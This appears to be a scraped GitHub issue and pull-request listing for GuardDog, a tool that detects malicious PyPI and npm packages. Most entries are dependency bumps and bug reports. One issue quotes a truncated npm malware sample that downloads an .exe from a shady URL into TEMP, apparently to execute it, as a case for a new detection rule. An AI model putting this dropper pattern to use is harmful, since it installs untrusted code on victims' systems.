guarddog
guarddog copied to clipboard
DataDog
:snake: :mag: GuardDog is a CLI tool to Identify malicious PyPI and npm packages
Bumps [coverage](https://github.com/nedbat/coveragepy) from 7.6.0 to 7.6.1. Changelog Sourced from coverage's changelog. Version 7.6.1 — 2024-08-04 Fix: coverage used to fail when measuring code using :func:runpy.run_path <python:runpy.run_path> with a :class:Path <python:pathlib.Path>...
![dependabot[bot] avatar](https://avatars.githubusercontent.com/in/29110?v=4 "dependabot[bot] avatar"){kind=avatar}
Similar pypi heuristic is not present in NPM: Sample: ```const {execFileSync } = require('child_process'); const Link = "http://someshadyurl.com/node_manager.exe"; const FinalPath = path.join(process.env.TEMP, "test.exe") async function main(){ await download(Link, FinalPath) await...
The rule `potentially_compromised_email_domain` uses `version.parse` (with `version`coming from https://github.com/pypa/packaging/ ) on all versions of a PyPI package https://github.com/DataDog/guarddog/blob/dcc98d70cc357b0d7e68485e2df4d8404605f300/guarddog/analyzer/metadata/pypi/potentially_compromised_email_domain.py#L35 Now, https://github.com/pypa/packaging/releases/tag/22.0 removed support for legacy version identifiers (see changelog), causing `version.parse`...
Example: ``` ➜ guarddog git:(v1.10.0) poetry run guarddog pypi scan --version=1.56.0 grpcio-tools Found 2 potentially malicious indicators in grpcio-tools code-execution: found 2 source code matches * This package is executing...
For context, we use artifactory to host a mirror of public pypi and our own internal packages. When running pip install on our requirements file, we need to specify these...
Bumps [sarif-tools](https://github.com/microsoft/sarif-tools) from 2.0.0 to 3.0.2. Release notes Sourced from sarif-tools's releases. v3.0.2 Fixed #55 part 2: Added executionSuccessful to copy operation output for SARIF schema compliance. v3.0.1 Fixed #58...
Bumps [urllib3](https://github.com/urllib3/urllib3) from 2.2.2 to 2.2.3. Release notes Sourced from urllib3's releases. 2.2.3 🚀 urllib3 is fundraising for HTTP/2 support urllib3 is raising ~$40,000 USD to release HTTP/2 support and...
Bumps [setuptools](https://github.com/pypa/setuptools) from 74.1.2 to 75.1.0. Changelog Sourced from setuptools's changelog. v75.1.0 Features Deprecated bdist_wheel.universal configuration. (#4617) Bugfixes Removed reference to upload_docs module in entry points. (#4650) v75.0.0 Features Declare...
Bumps [pytest](https://github.com/pytest-dev/pytest) from 8.3.2 to 8.3.3. Release notes Sourced from pytest's releases. 8.3.3 pytest 8.3.3 (2024-09-09) Bug fixes #12446: Avoid calling @property (and other instance descriptors) during fixture discovery --...
Bumps [disposable-email-domains](https://github.com/disposable-email-domains/disposable-email-domains) from 0.0.104 to 0.0.105. Commits See full diff in compare view [](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores) Dependabot will resolve any conflicts with this PR as long as you don't alter...